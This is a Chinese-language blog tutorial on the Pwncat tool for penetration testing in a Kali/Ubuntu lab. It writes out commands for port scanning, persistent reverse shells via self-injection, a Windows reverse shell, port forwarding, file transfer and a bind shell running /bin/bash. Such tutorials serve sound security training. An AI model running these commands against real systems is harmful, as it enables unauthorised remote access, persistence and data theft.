公众号:泷羽Sec---风宵
Pwncat
目录
介绍:
Pwncat作为一种强大且类似Netcat的工具,专为渗透测试人员及红队成员设计。它拥有带语法高亮和命令自动补全的交互式Shell,极大提高了使用的方便性。该工具不仅提供了充裕的二次开发接口,具备优良的扩展性,适应多种需求,还支持加密通信,保障了数据交互的安全性。与Netcat相比,Pwncat更适合应对复杂网络环境中的渗透挑战。
Pwncat的官网地址:
https://pwncat.org/安装方法
在Kali系统中, 可以使用apt命令安装pwncat。
apt install pwncat
端口扫描和Banner抓取
系统管理员可以使用Pwncat工具,通过设定端口范围,并结合使用-banner选项,对目标系统中的开放端口进行扫描,同时实现banner信息的抓取。
pwncat -z 192.168.1.23 1-100 pwncat -z 192.168.1.23 1-100 --banner
Pwncat 不仅可以在 TCP 端口上执行端口扫描,还可以使用-u标志来扫描 UDP 端口。
设为监听器
在执行监听器操作期间,pwncat通过在/tmp/文件夹下生成文件以实现持久化。即便连接中断,也能通过原先使用的端口重新获取反向shell。
pwncat -l 1234 --self-inject /bin/bash:192.168.1.7:1234
终止连接后,可以通过在同一端口运行 rlwrap 侦听器来检查持久性。
Pwncat 可以在多个端口上创建持久性连接的功能。
pwncat -l 1234 --self-inject /bin/bash:192.168.1.7:1234+2
可以看到除了1234端口之外,还可以在1235和1236端口上获得反向shell
Windows反向Shell
要取得反向 shell,可以借助 Windows 电脑上的反向 shell 生成器(访问 Online - Reverse Shell Generator),通过执行相关命令来获取反向 shell。
在执行从 revshells.com 复制的命令之前,在 kali的4444端口启动监听器
pwncat -l 4444
本地端口转发
使用以下命令在 Ubuntu 计算机中安装 pwncat
pip3 install pwncat
在成功获取到反向shell之后,观察到Ubuntu系统上8080端口有一个应用正在运行。为了从Kali系统中访问这个Web应用,下一步将执行以下操作以实现本地端口转发。
pwncat -L 0.0.0.0:5000 127.0.0.1 8080
在 kali 机器内访问 Web 应用程序,网址为:http://192.168.1.23:5000
发送和接收文件
在使用 pwncat 工具进行网络交互时,可以不仅仅用于建立逆向shell连接,还能够进行文件的发送和接收。为此,在的Ubuntu计算机上,可以首先创建一个名为
data.txt的文件。,并在要接收该文件的 kali 计算机中启动侦听器。要在kali机器中接收文件,可以使用以下命令:
pwncat -l 6666 > data.txt
监听器激活后,可以使用以下命令在 kali 机器中传输文件。
pwncat 192.168.1.7 6666 < data.txt
绑定Shell(Linux)
要获取绑定 shell,使用以下命令在 kali 机器内启动侦听器:
pwncat 192.168.1.23 9874在 Ubuntu 机器中输入以下命令:
pwncat -l -e '/bin/bash' 9874 -k
可以观察到在kali机器上获得了bind shell连接。由于上面使用了-k标志,一旦客户端断开连接,绑定 shell 就会重新接受新客户端。
好啦,本文的内容就到这了,希望对你有所帮助咯。。。
标签:---,shell,kali,Pwncat,端口,192.168,Bindshell,Shell,pwncat From: https://blog.csdn.net/2301_79949226/article/details/144933799